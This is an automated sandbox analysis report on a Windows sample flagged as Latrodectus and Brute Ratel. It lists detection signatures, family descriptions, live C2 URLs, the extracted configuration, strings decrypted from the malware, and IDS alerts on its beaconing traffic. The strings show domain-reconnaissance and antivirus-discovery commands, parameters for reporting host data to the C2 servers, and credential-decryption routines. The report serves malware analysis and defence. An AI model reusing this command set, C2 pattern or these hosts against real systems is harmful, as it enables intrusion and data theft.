Windows Analysis Report
wait.dll.dll

Overview

General Information

Sample name:	wait.dll.dll (renamed file extension from exe to dll)
Original sample name:	wait.dll.exe
Analysis ID:	1566852
MD5:	50bd4ff60c931861e46c801a60f9e916
SHA1:	13b14fb516fa726cc5fa9af17a2f93ff49449830
SHA256:	f2170f7dc2f97434ef4514ed4272dc8792177038a085f248ba33f9259720afda
Tags:	exeTA578user-k3dg3___
Infos:

Detection

BruteRatel, Latrodectus

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected BruteRatel

Yara detected Latrodectus

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Checks if browser processes are running

Contains functionality to inject threads in other processes

Contains functionality to steal Internet Explorer form passwords

Creates a thread in another existing process (thread injection)

Injects a PE file into a foreign processes

Injects code into the Windows Explorer (explorer.exe)

Modifies the context of a thread in another process (thread injection)

Performs a network lookup / discovery via net view

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Sets debug register (to hijack the execution of another thread)

Sigma detected: RunDLL32 Spawning Explorer

Tries to harvest and steal browser information (history, passwords, etc)

Uses ipconfig to lookup or modify the Windows network settings

Uses net.exe to modify the status of services

Uses whoami command line tool to query computer and username

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to launch a process as a different user

Contains functionality to query network adapater information

Contains functionality to read device registry values (via SetupAPI)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries device information via Setup API

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the current domain controller via net

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Suspicious Group And Account Reconnaissance Activity Using Net.EXE

Suricata IDS alerts with low severity for network traffic

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Brute Ratel C4, BruteRatel	Brute Ratel C4 (BRC4) is a commercial framework for red-teaming and adversarial attack simulation, which made its first appearance in December 2020. It was specifically designed to evade detection by endpoint detection and response (EDR) and antivirus (AV) capabilities. BRC4 allows operators to deploy a backdoor agent known as Badger (aka BOLDBADGER) within a target environment.This agent enables arbitrary command execution, facilitating lateral movement, privilege escalation, and the establishment of additional persistence avenues. The Badger backdoor agent can communicate with a remote server via DNS over HTTPS, HTTP, HTTPS, SMB, and TCP, using custom encrypted channels. It supports a variety of backdoor commands including shell command execution, file transfers, file execution, and credential harvesting. Additionally, the Badger agent can perform tasks such as port scanning, screenshot capturing, and keystroke logging. Notably, in September 2022, a cracked version of Brute Ratel C4 was leaked in the cybercriminal underground, leading to its use by threat actors.	No Attribution	https://0xdarkvortex.dev/hiding-in-plainsight/ https://0xdarkvortex.dev/proxying-dll-loads-for-hiding-etwti-stack-tracing/ https://andreafortuna.org/2023/02/23/how-to-detect-brute-ratel-activities https://blog.krakz.fr/articles/latrodectus/ https://blog.reveng.ai/latrodectus-distribution-via-brc4/	https://malpedia.caad.fkie.fraunhofer.de/details/win.brute_ratel_c4

Name	Description	Attribution	Blogpost URLs	Link
Latrodectus, Latrodectus	First discovered in October 2023, BLACKWIDOW is a backdoor written in C that communicates over HTTP using RC4 encrypted requests. The malware has the capability to execute discovery commands, query information about the victim's machine, update itself, as well as download and execute an EXE, DLL, or shellcode. The malware is believed to have been developed by LUNAR SPIDER, the creators of IcedID (aka BokBot) Malware.	No Attribution	https://0x0d4y.blog/case-study-analyzing-and-implementing-string-decryption-algorithms-latrodectus/ https://0x0d4y.blog/latrodectus-technical-analysis-of-the-new-icedid/ https://any.run/malware-trends/latrodectus https://blog.krakz.fr/articles/latrodectus/ https://blog.reveng.ai/latrodectus-distribution-via-brc4/	https://malpedia.caad.fkie.fraunhofer.de/details/win.latrodectus

Signatures

AV Detection

Antivirus detection for URL or domain

Source: https://reateberam.com/test/1303063_94378682313560_2056837URLS1https://dogirafer.com/test/4190877_54	Avira URL Cloud: Label: malware
Source: https://reateberam.com/test/	Avira URL Cloud: Label: malware
Source: https://reateberam.com/test/4560D	Avira URL Cloud: Label: malware
Source: https://reateberam.com/test/9362058_57969102112118_633157URLS1https://dogirafer.com/test/8477611_767	Avira URL Cloud: Label: malware
Source: https://reateberam.com/test/t60G	Avira URL Cloud: Label: malware
Source: https://reateberam.com/test/X	Avira URL Cloud: Label: malware
Source: https://reateberam.com/	Avira URL Cloud: Label: malware
Source: https://reateberam.com/test/w	Avira URL Cloud: Label: malware
Source: https://reateberam.com/files/stkm.bino	Avira URL Cloud: Label: malware
Source: https://reateberam.com/q	Avira URL Cloud: Label: malware
Source: https://reateberam.com/files/stkm.bin	Avira URL Cloud: Label: malware
Source: https://reateberam.com/test/4439042_94940942440575_5318539URLS1https://dogirafer.com/test/3185439_50	Avira URL Cloud: Label: malware
Source: https://reateberam.com/test/4560	Avira URL Cloud: Label: malware
Source: https://reateberam.com/files/stkm.binSL	Avira URL Cloud: Label: malware
Source: https://reateberam.com/test/3630449_22862766669148_5703346URLS1https://dogirafer.com/test/6092916_19	Avira URL Cloud: Label: malware
Source: https://reateberam.com/p	Avira URL Cloud: Label: malware

Found malware configuration

Source: 8.2.explorer.exe.3030000.0.unpack

Malware Configuration Extractor: Latrodectus {"C2 url": ["https://reateberam.com/test/", "https://dogirafer.com/test/"], "Group Name": "Lambda", "Campaign ID": 3306744842}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Sample uses string decryption to hide its real strings

Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: /c ipconfig /all
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: /c systeminfo
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: /c nltest /domain_trusts
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: /c net view /all
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: /c nltest /domain_trusts /all_trusts
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: /c net view /all /domain
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: &ipconfig=
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: /c net group "Domain Admins" /domain
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: C:\Windows\System32\wbem\wmic.exe
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: /c net config workstation
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName \| findstr /V /B /C:displayName \|\| echo No Antivirus installed
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: /c whoami /groups
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: &systeminfo=
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: &domain_trusts=
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: &domain_trusts_all=
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: &net_view_all_domain=
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: &net_view_all=
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: &net_group=
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: &wmic=
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: &net_config_ws=
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: &net_wmic_av=
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: &whoami_group=
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: "pid":
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: "%d",
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: "proc":
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: "%s",
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: "subproc": [
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: &proclist=[
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: "pid":
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: "%d",
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: "proc":
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: "%s",
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: "subproc": [
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: &desklinks=[
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: .
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: "%s"
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: Update_%x
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: Custom_update
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: .dll
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: .exe
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: Error
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: runnung
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: %s/%s
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: front
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: /files/
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: Lambda
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: Cookie:
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: POST
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: GET
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: curl/7.88.1
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: CLEARURL
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: URLS
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: COMMAND
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: ERROR
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: DR2HpnCotlUgjMnaEE9p4nTXYS0dKcCqcD0K4aPi1LctrLPoDHUhq75vfji41aMg
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: [{"data":"
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: "}]
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: &dpost=
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: https://reateberam.com/test/
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: https://dogirafer.com/test/
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: \*.dll
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: AppData
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: Desktop
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: Startup
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: Personal
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: Local AppData
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: <html>
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: <!DOCTYPE
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: %s%d.dll
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: C:\WINDOWS\SYSTEM32\rundll32.exe %s,%s
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: Content-Length: 0
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: C:\WINDOWS\SYSTEM32\rundll32.exe %s
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: Content-Type: application/dns-message
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: Content-Type: application/ocsp-request
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: 12345
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: 12345
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: &stiller=
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: %s%d.exe
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: %x%x
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: &mac=
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: %02x
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: :%02x
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: &computername=%s
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: &domain=%s
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: %04X%04X%04X%04X%08X%04X
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: LogonTrigger
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: %04X%04X%04X%04X%08X%04X
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: \Registry\Machine\
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: TimeTrigger
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: PT0H%02dM
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: %04d-%02d-%02dT%02d:%02d:%02d
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: PT0S
Source: 8.2.explorer.exe.3030000.0.unpack	String decryptor: \update_data.dat

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8D7AC00 CryptStringToBinaryA,swprintf,LocalAlloc,swprintf,CryptStringToBinaryA,swprintf,CryptDecodeObjectEx,swprintf,LocalAlloc,swprintf,CryptDecodeObjectEx,swprintf,CryptImportPublicKeyInfoEx2,swprintf,LocalAlloc,swprintf,swprintf,swprintf,BCryptDestroyKey,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,	3_2_00007FF8A8D7AC00
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8D7CEB0 BCryptOpenAlgorithmProvider,swprintf,BCryptGetProperty,swprintf,GetProcessHeap,HeapAlloc,swprintf,swprintf,swprintf,swprintf,GetProcessHeap,HeapAlloc,swprintf,BCryptExportKey,swprintf,	3_2_00007FF8A8D7CEB0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8D7C3D0 BCryptOpenAlgorithmProvider,swprintf,swprintf,GetProcessHeap,HeapAlloc,swprintf,swprintf,swprintf,swprintf,GetProcessHeap,HeapFree,BCryptDestroyHash,BCryptCloseAlgorithmProvider,	3_2_00007FF8A8D7C3D0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8D7B720 swprintf,swprintf,GetProcessHeap,HeapAlloc,swprintf,BCryptDecrypt,swprintf,BCryptCloseAlgorithmProvider,GetProcessHeap,HeapFree,BCryptDestroyKey,	3_2_00007FF8A8D7B720
Source: C:\Windows\explorer.exe	Code function: 8_2_0E455E5C StrStrIA,StrChrA,CryptUnprotectData,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,LocalFree,GetProcessHeap,HeapFree,	8_2_0E455E5C
Source: C:\Windows\explorer.exe	Code function: 8_2_0E455FE4 CryptUnprotectData,	8_2_0E455FE4
Source: C:\Windows\explorer.exe	Code function: 8_2_0E515C60 CryptUnprotectData,	8_2_0E515C60
Source: C:\Windows\explorer.exe	Code function: 8_2_0E458568 lstrlenW,CryptAcquireContextA,CryptCreateHash,lstrlenW,CryptHashData,CryptGetHashParam,wsprintfA,lstrcatA,wsprintfA,lstrcatA,CryptDestroyHash,CryptReleaseContext,RegQueryValueExA,lstrlenW,CryptUnprotectData,LocalFree,	8_2_0E458568
Source: C:\Windows\explorer.exe	Code function: 8_2_0E45453C lstrcpyA,lstrcatA,RegOpenKeyExA,RegEnumKeyExA,RegOpenKeyExA,lstrcpyW,RegQueryValueExW,CryptUnprotectData,LocalFree,RegCloseKey,RegEnumKeyExA,RegCloseKey,	8_2_0E45453C
Source: C:\Windows\explorer.exe	Code function: 8_2_0E456078 BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGetProperty,BCryptGetProperty,BCryptGenerateSymmetricKey,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,BCryptDecrypt,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,BCryptCloseAlgorithmProvider,GetProcessHeap,HeapFree,	8_2_0E456078

Source: unknown	HTTPS traffic detected: 172.67.217.190:443 -> 192.168.2.5:49907 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.217.190:443 -> 192.168.2.5:49941 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.217.190:443 -> 192.168.2.5:49950 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.68.89:443 -> 192.168.2.5:49972 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.217.190:443 -> 192.168.2.5:50006 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.68.89:443 -> 192.168.2.5:50029 version: TLS 1.2

Source: wait.dll.dll

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF

Source:

Binary string: C:\dvs\p4\build\sw\rel\gpu_drv\r565\r565_00\drivers\ui\NvXDCore\x64\ReleaseWin7\bin\NvXDCore.pdb source: rundll32.exe, 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4538924938.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000006.00000002.4538185673.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmp, wait.dll.dll

Spreading

Performs a network lookup / discovery via net view

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all

Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8D72E90 swprintf,swprintf,FindFirstFileW,GetLastError,swprintf,FindNextFileW,CompareFileTime,FindNextFileW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,swprintf,swprintf,FindClose,	3_2_00007FF8A8D72E90
Source: C:\Windows\explorer.exe	Code function: 8_2_0303A8E0 FindFirstFileW,FindNextFileW,LoadLibraryW,	8_2_0303A8E0
Source: C:\Windows\explorer.exe	Code function: 8_2_03032B28 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,	8_2_03032B28
Source: C:\Windows\explorer.exe	Code function: 8_2_030404C0 FindFirstFileW,	8_2_030404C0
Source: C:\Windows\explorer.exe	Code function: 8_2_0838A8E0 FindFirstFileW,FindNextFileW,LoadLibraryW,	8_2_0838A8E0
Source: C:\Windows\explorer.exe	Code function: 8_2_083904C0 FindFirstFileW,	8_2_083904C0
Source: C:\Windows\explorer.exe	Code function: 8_2_08382B28 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,	8_2_08382B28
Source: C:\Windows\explorer.exe	Code function: 8_2_0885A8E0 FindFirstFileW,FindNextFileW,LoadLibraryW,	8_2_0885A8E0
Source: C:\Windows\explorer.exe	Code function: 8_2_088604C0 FindFirstFileW,	8_2_088604C0
Source: C:\Windows\explorer.exe	Code function: 8_2_08852B28 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,	8_2_08852B28
Source: C:\Windows\explorer.exe	Code function: 8_2_0E456604 lstrcpyA,lstrlenA,lstrcatA,lstrcatA,FindFirstFileA,lstrcpyA,lstrcatA,lstrcatA,lstrcatA,StrStrIA,lstrcpyA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	8_2_0E456604
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4516F4 FindFirstFileW,FindNextFileW,LoadLibraryW,	8_2_0E4516F4
Source: C:\Windows\explorer.exe	Code function: 8_2_0E515C40 FindFirstFileW,FindClose,	8_2_0E515C40
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4F50D8 FindFirstFileA,	8_2_0E4F50D8
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4F5088 CloseHandle,GetCurrentProcessId,FindFirstFileA,FindClose,GetFileSize,	8_2_0E4F5088

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:49928 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2018052 - Severity 1 - ET MALWARE Zbot Generic URI/Header Struct .bin : 192.168.2.5:49941 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:49922 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:49972 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50009 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50007 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50000 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:49999 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:49986 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50001 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50013 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50015 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2018052 - Severity 1 - ET MALWARE Zbot Generic URI/Header Struct .bin : 192.168.2.5:49950 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50002 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:49980 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50014 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:49962 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50010 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50021 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50003 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50025 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50011 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50019 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50018 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50030 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50032 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50017 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50026 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50036 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50008 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50023 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50033 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50039 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50037 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50006 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:49995 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:49916 -> 172.67.217.190:443
